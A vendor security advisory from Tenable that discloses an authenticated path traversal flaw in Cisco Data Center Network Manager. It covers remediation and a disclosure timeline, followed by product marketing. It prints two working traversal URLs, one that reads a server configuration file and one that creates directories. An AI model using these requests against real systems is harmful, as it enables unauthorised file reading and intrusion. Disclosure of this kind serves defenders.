Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

[R2] Cisco Data Center Network Manager Authenticated Path Traversal

Medium

Synopsis

While developing a Nessus plugin for CVE-2018-0258 Tenable discovered an authenticated path traversal vulnerability in Cisco Data Center Network Manager (DCNM). The vulnerability allows a remote authenticated attacker to read arbitrary files and create arbitrary directories on the DCNM hosts.

The path traversal logic can be found in the xct.components.services.smart.data.download.SampleFileDownloadServlet servlet in dcnmweb.war. The servlet is used by the Download endpoint. An attacker can use the following URL to download files:

https://<cisco_dcnm_host>/Download?svc=samplefile&downloadLocation=../../../../../../../../Program%20Files/Cisco%20Systems/dcm/jboss-as-7.2.0.Final/standalone/configuration&downloadFiles=standalone-san.xml

And the following URL to create directories:

https://<cisco_dcnm_host>/Download?svc=samplefile&downloadLocation=../../../../../../../../folder&downloadFiles=standalone-san.xml

Solution

Upgrade to Cisco Data Center Network Manager 11.0.1

Disclosure Timeline

06-07-2018 - Vulnerability reported to Cisco via encrypted email.
06-08-2018 - Cisco acknowledges receipt of the vulnerability write up and assigns PSIRT-0553713140.
07-25-2018 - Tenable asks for an update.
07-25-2018 - Cisco responds that the vulnerability owner has been directed to update Tenable.
07-30-2018 - Cisco indicates the bug has been fixed by development. Awaiting to hear about the release date.
07-31-2018 - Tenable requests the patch.
08-02-2018 - Cisco responds that the fix was published in 11.0.1. Tenable discovers this was released on July 11th.
08-08-2018 - Tenable notes the bug fix does not appear in an advisory or release notes. Tenable also asks why they weren't notified of the release.
08-13-2018 - Cisco says advisory will be released on 10/3.
08-20-2018 - Tenable analyzes 11.0.1 and confirms the vulnerability is fixed.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2018-0464
Tenable Advisory ID: TRA-2018-20
CVSSv2 Base / Temporal Score:
5.5 / 4.5
CVSSv2 Vector:
AV:N/AC:L/Au:S/C:P/I:P/A:N
Nessus Plugin ID: 112019
Affected Products:
Cisco Data Center Network Manager 10.4.2
Risk Factor:
Medium
Additional Keywords:
PSIRT-0553713140
CSCvj86072

Advisory Timeline

08-21-2018 - [R1] Initial release
08-30-2018 - [R2] Updated to include the Cisco advisory

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Try Tenable Web App Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training